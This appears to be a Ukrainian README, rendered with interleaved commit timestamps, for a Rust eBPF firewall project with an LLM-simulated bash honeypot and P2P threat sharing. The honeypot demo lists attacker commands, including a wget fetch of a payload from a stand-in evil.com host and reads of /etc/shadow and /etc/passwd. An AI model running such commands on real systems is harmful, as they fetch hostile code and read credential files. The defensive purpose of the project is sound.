2026-04-07 22:28:11 +00:00
< p align = "center" >
< strong > 🌐 Мова:< / strong >
< a href = "README.md" > English< / a > |
< a href = "README_UA.md" > Українська< / a > |
< a href = "README_RU.md" > Русский< / a >
< / p >
< p align = "center" >
< img src = "https://readme-typing-svg.herokuapp.com?font=JetBrains+Mono&weight=800&size=45&duration=3000&pause=1000&color=FF0000¢er=true&vCenter=true&width=600&lines=THE+BLACKWALL" alt = "The Blackwall" >
< br >
2026-04-17 23:58:24 +03:00
< em > Адаптивний eBPF файрвол з AI-ханіпотом та P2P загрозовою мережею< / em >
2026-04-07 22:28:11 +00:00
< / p >
2026-04-17 23:58:24 +03:00
# The Blackwall — Я побудував справжній Блеквол, б о Cyberpunk 2077 зламав мені мозок
2026-04-07 22:28:11 +00:00
< p align = "center" >
2026-04-17 23:58:24 +03:00
< img src = "https://img.shields.io/badge/language-Rust-orange?style=for-the-badge&logo=rust" / >
< img src = "https://img.shields.io/badge/kernel-eBPF%2FXDP-blue?style=for-the-badge" / >
< img src = "https://img.shields.io/badge/AI-Ollama%20LLM-green?style=for-the-badge" / >
< img src = "https://img.shields.io/badge/P2P-libp2p-purple?style=for-the-badge" / >
< img src = "https://img.shields.io/badge/vibe-Cyberpunk-red?style=for-the-badge" / >
2026-04-07 22:28:11 +00:00
< / p >
< p align = "center" >
2026-04-17 23:58:24 +03:00
< em > "З а Блекволом є речі, від погляду на які у нетраннера вигорить мозок."< / em > < br >
< strong > — Альт Каннінгем, мабуть< / strong >
2026-04-07 22:28:11 +00:00
< / p >
< p align = "center" >
< strong > Зараз будую enterprise AI-автоматизацію в < a href = "https://dokky.com.ua" > Dokky< / a > < / strong > < br >
2026-04-17 23:58:24 +03:00
< strong > Enterprise ліцензування та консалтинг: < a href = "mailto:xzcrpw1 @gmail .com" > xzcrpw1@gmail .com</ a ></ strong >
2026-04-07 22:28:11 +00:00
< / p >
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**TL;DR:** Грав у Cyberpunk, надихнувся, написав цілий адаптивний файрвол, що працює всередині ядра Linux, ловить загрози за допомогою AI, заманює атакерів у фейковий сервер на базі LLM, і ділиться загрозовою інфою через децентралізовану P2P-мережу.
**~21к рядків Rust. 298 тестів. 10 крейтів. Одна людина.**
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Що це?
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**The Blackwall** — назва від цифрового б а р 'єру з Cyberpunk 2077, який тримає рогів AI від цивілізованого Нету.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Моя версія. Багаторівнева система захисту, яка не просто блокує загрози — вона їх вивчає, ловить в пастку і розповідає про них кожному іншому вузлу.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Три ключові рівні, що працюють разом:
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**1. Файрвол на рівні ядра (eBPF/XDP)** — аналіз пакетів відбувається всередині ядра Linux ще до того, як трафік потрапить в мережевий стек. Рішення за наносекунди. Ентропійний аналіз, TLS-фінгерпринтинг, глибока інспекція пакетів, рейт-лімітинг, трекінг з'єднань — все працює в BPF віртуальній машині.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**2. AI-ханіпот (Tarpit)** — замість того, щоб просто дропати зловмисний трафік, він перенаправляється на фейковий Linux-сервер. LLM симулює bash, відповідає на команди, подає фейкові файли, грає роль зламаного `root@web-prod-03` . Атакери витрачають свій час, поки все записується.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**3. P2P загрозова мережа (HiveMind)** — вузли знаходять один одного, обмінюються IoC через зашифровану libp2p-мережу, голосують за загрози через консенсус, трекають репутацію пірів. Одна нода ловить сканер — всі інші дізнаються за секунди.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Плюс: розподілений контролер сенсорів, API для інтеграції з SIEM (STIX/TAXII/Splunk/QRadar/CEF), TUI-дашборд, поведінковий профайлінг по кожному IP, інгест загрозових фідів, PCAP-форензіка.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Архітектура
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00

2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00

2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**Пайплайн:**
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
```
Пакет приходить
→ XDP: ентропія, блокліст/вайтліст, CIDR, рейт-ліміт, JA4, DPI
→ RingBuf (zero-copy) → Демон в юзерспейсі
→ Статичні правила → Поведінковий автомат → JA4 БД → LLM класифікація
→ Вердикт: PASS / DROP / REDIRECT_TO_TARPIT
→ eBPF BLOCKLIST оновлюється в реальному часі
→ IoC розшарюється в HiveMind P2P-мережу
```
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Що робить кожен крейт
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### blackwall-ebpf — Рівень ядра (1,334 рядки)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
eBPF-програми на XDP-хуку — найраніша точка, де можна торкнутись пакета. Працює під жорсткими правилами BPF-верифікатора: 512 байт стеку, без хіпа, без float, тільки обмежені цикли.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
- **Розрахунок ентропії** — частотний аналіз байтів, цілочисельна ентропія Шеннона (0– 7936). Висока ентропія на не-TLS портах → зашифрований C2-трафік
- **TLS-фінгерпринтинг** — парсить ClientHello, витягує cipher suites, extensions, ALPN, SNI → JA4-відбиток. Один фінгерпринт покриває тисячі ботів з тією ж TLS-лібою
- **DPI через tail calls** — `PROG_ARRAY` диспатчить протокольні аналізатори:
- HTTP: метод + URI (ловить `/wp-admin` , `/phpmyadmin` , path traversal)
- DNS: довжина запиту + кількість лейблів (детекція DNS-тунелювання)
- SSH: фінгерпринтинг банера (`libssh` , `paramiko` , `dropbear` )
- **DNAT-редірект** — підозрілий трафік тихо NAT'иться на тарпіт. Атакер не знає, що покинув реальний сервер
- **Трекінг з'єднань** — stateful TCP-моніторинг, LRU-мап (16K записів)
- **Рейт-лімітинг** — per-IP token bucket, запобігає флуду і переповненню RingBuf
- **4 RingBuf-канали** — EVENTS, TLS_EVENTS, EGRESS_EVENTS, DPI_EVENTS
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Мапи: `BLOCKLIST` , `ALLOWLIST` , `CIDR_RULES` , `COUNTERS` , `RATE_LIMIT` , `CONN_TRACK` , `NAT_TABLE` , `TARPIT_TARGET` , `PROG_ARRAY` , плюс 4 RingBuf-мапи.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### blackwall — Мозок (6,362 рядки)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Головний демон. Завантажує eBPF-програми, споживає евенти з RingBuf, запускає пайплайн рішень.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
- **Rules engine** — статичний блокліст/вайтліст, CIDR-діапазони з конфіга + фіди
- **Поведінковий автомат** — профайлінг по IP: частота з'єднань, різноманіття портів, розподіл ентропії, аналіз таймінгу. Фази: `New → Suspicious → Malicious → Blocked` (а б о `→ Trusted` ). Детекція біконінгу через цілочисельний CoV
- **JA4-база** — матчинг TLS-фінгерпринтів з відомими шкідливими сигнатурами
- **AI-класифікація** — інтеграція з Ollama, моделі ≤3B параметрів (Qwen3 1.7B/0.6B). Батчинг евентів, структуровані JSON-вердикти
- **Загрозові фіди** — інгест зовнішніх фідів (Firehol, abuse.ch)
- **PCAP-захоплення** — форензічний запис з ротацією + компресією
- **Зворотний зв'язок у реальному часі** — вердикти пишуться назад у eBPF BLOCKLIST
- **HiveMind-бридж** — підтверджені IoC шарються в P2P-мережу
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### tarpit — Пастка (2,179 рядків)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Рівень обману. Атакери, перенаправлені сюди через DNAT, думають, що потрапили на реальний сервер.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
- **Авто-детекція протоколу** — визначає SSH, HTTP, MySQL, DNS по першим байтам
- **Хендлери протоколів:**
- SSH: банер, авторизація, PTY-сесія
- HTTP: фейковий WordPress, `/wp-admin` , `.env` , реалістичні хедери
- MySQL: хендшейк, авторизація, відповіді з фейковими даними
- DNS: правдоподібні відповіді на запити
- **LLM-симуляція bash** — кожна команда → Ollama. `ls -la` повертає файли, `cat /etc/shadow` — хеші, `wget` — "завантажує", `mysql -u root` — "підключається". LLM не знає, що це ханіпот
- **Експоненціальний джиттер** — чанки 1-15 байт, затримка 100мс – 30с . Максимум витраченого часу
- **Анти-фінгерпринтинг** — рандомізовані TCP window, TTL, початкова затримка. p0f/Nmap не розпізнають
- **Захист від prompt injection** — 25+ паттернів, симуляція ніколи не ламається
- **Credential canaries** — всі введені креди логуються
- **Управління сесіями** — стан по з'єднанню, історія команд, трекінг CWD
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### hivemind — Мережа (6,526 рядків)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Децентралізований threat intelligence на libp2p.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
- **Транспорт** — QUIC + Noise-шифрування, кожне з'єднання автентифіковане
- **Пошук пірів** — Kademlia DHT (глобальний), mDNS (локальний), конфігуровані seed-піри
- **Обмін IoC** — GossipSub pub/sub, пропагація по мережі за секунди
- **Консенсус** — N незалежних підтверджень обов'язкові. Ніякої одноджерельної довіри
- **Репутація** — піри заробляють реп за хороші IoC, втрачають за фолси. Погані актори слешуються
- **Захист від Sybil** — PoW-челенджі, детекція самопосилань в k-buckets, рейт-ліміт реєстрації
- **Федеративне навчання** — локальний тренінг + FedAvg-агрегація, шарінг градієнтів (FHE-стаб)
- **Захист від data poisoning** — моніторинг розподілу градієнтів, детекція model inversion
- **ZKP-інфраструктура** — Groth16 стаби для trustless-верифікації IoC
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### hivemind-api — Enterprise-інтеграція (2,711 рядків)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
REST API для підключення HiveMind-даних до корпоративних SIEM.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
- **STIX 2.1** — стандартний формат threat intelligence
- **TAXII 2.1** — протокол обміну загрозами
- **Splunk HEC** — HTTP Event Collector
- **QRadar LEEF** — Log Event Extended Format
- **CEF** — Common Event Format
- **Тіроване ліцензування** — Basic / Professional / Enterprise / NationalSecurity
- **Лайв-статистика** — XDP-каунтери + P2P-метрики в реальному часі
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### hivemind-dashboard — Монітор (571 рядок)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
TUI-дашборд. Чистий ANSI — без ratatui, без crossterm, сирі escape-коди. Лайв-статус мережі.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### blackwall-controller — Командний центр (356 рядків)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
CLI для управління декількома сенсорами. HMAC-автентифікація (PSK). Статистика, список заблокованих IP, здоров'я всіх нод з одного місця.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### common — Контракт (1,126 рядків)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
`#[repr(C)]` типи між ядром і юзерспейсом: `PacketEvent` , `RuleKey` , `TlsComponentsEvent` , `DpiEvent` , каунтери, base64. Контракт, на якому побудована вся система.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
### xtask — Білд-тули (46 рядків)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
`cargo xtask build-ebpf` — компіляція nightly + `bpfel-unknown-none` .
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Стек технологій
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
| Рівень | Технологія | Чому |
|--------|-----------|------|
| Ядро | **aya-rs** (eBPF/XDP) | Чистий Rust eBPF — без C, без libbpf |
| Рантайм | **Tokio** (current_thread) | Однопотоковий, без оверхеду |
| IPC | **RingBuf** | Zero-copy, 7.5% оверхед проти 35% у PerfEventArray |
| Конкурентність | **papaya** + **crossbeam** | Lock-free мапи + MPMC-черги |
| P2P | **libp2p** | QUIC, Noise, Kademlia, GossipSub, mDNS |
| Крипта | **ring** | ECDSA, SHA256, HKDF, HMAC |
| HTTP | **hyper** 1.x | Мінімальний. Без веб-фреймворків |
| AI | **Ollama** | Локальний інференс, GGUF-квантизація |
| Конфіг | **TOML** | Читабельний, мінімальний |
| Логування | **tracing** | Структуроване. Zero `println!` в проді |
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**22 залежності.** Кожна обґрунтована. Без bloat-крейтів.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Деплой
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
```
deploy/
docker/
Dockerfile.blackwall # Multi-stage, stripped binary
Dockerfile.ebpf # Nightly eBPF build
helm/
blackwall/ # K8s DaemonSet + ConfigMap
systemd/
server/ # Серверні юніти
laptop/ # Dev/ноутбук юніти
examples/ # Приклади конфігів
healthcheck.sh # Перевірка компонентів
```
Docker multi-stage. Helm для K8s (DaemonSet, один на ноду, `CAP_BPF` ). systemd для bare metal.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
## Швидкий старт
2026-04-17 23:58:24 +03:00
### Вимоги
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
- Linux 5.15+ з BTF (а б о WSL2 з кастомним ядром)
- Rust stable + nightly з `rust-src`
- `bpf-linker` — `cargo install bpf-linker`
- Ollama (опціонально, для AI)
2026-04-07 22:28:11 +00:00
### Збірка
```bash
2026-04-17 23:58:24 +03:00
cargo xtask build-ebpf # eBPF (nightly)
cargo build --release --workspace # весь юзерспейс
cargo clippy --workspace -- -D warnings # лінт
cargo test --workspace # 298 тестів
2026-04-07 22:28:11 +00:00
```
### Запуск
```bash
2026-04-17 23:58:24 +03:00
sudo RUST_LOG=info ./target/release/blackwall config.toml # потрібен root/CAP_BPF
RUST_LOG=info ./target/release/tarpit # ханіпот
RUST_LOG=info ./target/release/hivemind # P2P-нода
RUST_LOG=info ./target/release/hivemind-api # API загрозових фідів
./target/release/hivemind-dashboard # TUI
BLACKWALL_PSK=< key > ./target/release/blackwall-controller stats < ip > :< port >
2026-04-07 22:28:11 +00:00
```
2026-04-17 23:58:24 +03:00
### Конфіг
2026-04-07 22:28:11 +00:00
```toml
[network]
interface = "eth0"
xdp_mode = "generic"
2026-04-17 23:58:24 +03:00
[thresholds]
entropy_anomaly = 6000
2026-04-07 22:28:11 +00:00
[tarpit]
enabled = true
2026-04-17 23:58:24 +03:00
port = 2222
base_delay_ms = 100
max_delay_ms = 30000
2026-04-07 22:28:11 +00:00
[tarpit.services]
ssh_port = 22
http_port = 80
mysql_port = 3306
dns_port = 53
[ai]
enabled = true
ollama_url = "http://localhost:11434"
model = "qwen3:1.7b"
2026-04-17 23:58:24 +03:00
fallback_model = "qwen3:0.6b"
[rules]
blocklist = ["1.2.3.4"]
allowlist = ["127.0.0.1"]
2026-04-07 22:28:11 +00:00
[feeds]
enabled = true
refresh_interval_secs = 3600
[pcap]
enabled = true
output_dir = "/var/lib/blackwall/pcap"
[distributed]
enabled = false
mode = "standalone"
bind_port = 9471
2026-04-17 23:58:24 +03:00
psk = "your-256bit-hex-key"
2026-04-07 22:28:11 +00:00
```
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Тарпіт в дії
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Підключаєшся до тарпіта і бачиш:
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
```
Ubuntu 24.04.2 LTS web-prod-03 tty1
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
web-prod-03 login: root
Password:
Last login: Thu Mar 27 14:22:33 2025 from 10.0.0.1
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
root@web -prod-03:~#
```
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Нічого з цього не існує. LLM грає в bash. `ls` — файли. `cat /etc/passwd` — юзери. `mysql -u root -p` — підключення. `wget http://evil.com/payload` — завантаження.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
30 хвилин на сервері, якого нема. Кожен кістрок записаний. IoC розшарені в мережу.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Модель безпеки
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
- Кожен байт з пакетів = контрольований атакером. В с і `ctx.data()` з bounds-check
- Zero `unwrap()` в проді — `?` , `expect("reason")` , а б о `match`
- Prompt injection: очікується. 25+ паттернів ловиться, симуляція не ламається
- P2P: Sybil guard (PoW + слешінг репутації), N-of-M консенсус по IoC
- Тарпіт: TCP-рандомізація — p0f/Nmap не зможуть зафінгерпринтити
- Контролер: HMAC-автентифікований, без неавторизованого доступу
- Ядро: рейт-лімітинг запобігає переповненню RingBuf
- Шатдаун: чистить правила файрволу, ніяких осиротілих iptables-записів
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Enterprise-версія
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**[Blackwall Enterprise ](https://github.com/xzcrpw/blackwall-enterprise )** додає те, чого немає ні в кого: **аналіз Agent-to-Agent (A2A) трафіку в реальному часі на рівні ядра.**
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
AI-агенти починають спілкуватись між собою — LLM-to-LLM, через MCP, A2A-протокол, агентні фреймворки. Це нова поверхня атаки: prompt injection через міжагентну комунікацію, підробка інтентів, крадіжка ідентичності агентів. Н а ринку нічого для цього нема. Blackwall Enterprise — перший і єдиний такий модуль.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**~8,400 рядків Rust.** Окреме репо, окрема ліцензія.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
| Компонент | Що робить |
|-----------|-----------|
| **A-JWT Валідація** | Верифікація Agentic JWT за IETF-драфтом. Перевірка підпису через `ring` , запобігання реплею, кешування ключів |
| **Верифікація інтентів** | Вичерпний матчинг полів — `max_amount` , `allowed_recipients` (glob), allowlist дій |
| **Чексума агента** | SHA256(system_prompt + tools_config) — темперинг = миттєвий блок |
| **Proof-of-Possession** | cnf/jwk ECDSA-прив'язка — доводить, що агент тримає свій ключ |
| **eBPF Uprobes** | Хуки в OpenSSL/GnuTLS `SSL_write` /`SSL_read` — перехоплює A2A-плейнтекст без розриву TLS |
| **Risk-Based Routing** | Конфігуровані policy: allow / review / block по рівню ризику |
| **ZK Proofs** | Атестація порушень без розкриття сирого трафіку (Groth16) |
| **P2P Gossip** | Proof порушень броадкастяться в HiveMind-меш |
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
**Ліцензування:** [xzcrpw1@gmail.com ](mailto:xzcrpw1@gmail.com )
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
## Статистика
```
Мова: 100% Rust
Всього: ~21,200 рядків
Файлів: 92 .rs
Крейтів: 10
Тестів: 298
unwrap(): 0 в проді
Залежностей: 22 (проаудитовані)
eBPF-стек: ≤ 512 байт завжди
Clippy: -D warnings, нуль проблем
CI: check + clippy + tests + eBPF nightly build
```
---
## Кіберпанк-довідка
| Cyberpunk 2077 | Цей проект |
|----------------|-----------|
| The Blackwall | Файрвол на рівні ядра eBPF/XDP |
| ICE | XDP fast-path: ентропія + JA4 + DPI + DNAT |
| Демони | LLM-тарпіт — фейковий сервер за стіною |
| NetWatch | Поведінковий движок + автомат по IP |
| Rogue AIs | Ботнети, сканери, C2-бікони |
| Braindance | PCAP-форензіка |
| Колектив нетраннерів | HiveMind P2P-меш |
| Інфа від фіксерів | Загрозові фіди |
| Arasaka C& C | Розподілений контролер |
---
2026-04-07 22:28:11 +00:00
## Дисклеймер
2026-04-17 23:58:24 +03:00
Дослідницький проект у сфері безпеки. Для захисту вашої власної інфраструктури. Н е використовуйте проти інших.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Н е афілійований з CD Projekt Red. Просто г р а , яка перекроїла мій мозок найкращим чином.
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
---
2026-04-07 22:28:11 +00:00
## Ліцензія
2026-04-17 23:58:24 +03:00
**BSL 1.1** (Business Source License)
2026-04-07 22:28:11 +00:00
2026-04-17 23:58:24 +03:00
Ліцензіар: Vladyslav Soliannikov
Change Date: April 8, 2030
Change License: Apache-2.0
---
2026-04-07 22:28:11 +00:00
< p align = "center" >
2026-04-17 23:58:24 +03:00
< strong > Подобається? < a href = "https://github.com/xzcrpw/blackwall" > Став зірку< / a > < / strong >
2026-04-07 22:28:11 +00:00
< / p >
< p align = "center" >
2026-04-17 23:58:24 +03:00
< strong > < em > "Прокинься, самурай. Маємо мережу захищати."< / em > < / strong >
< / p >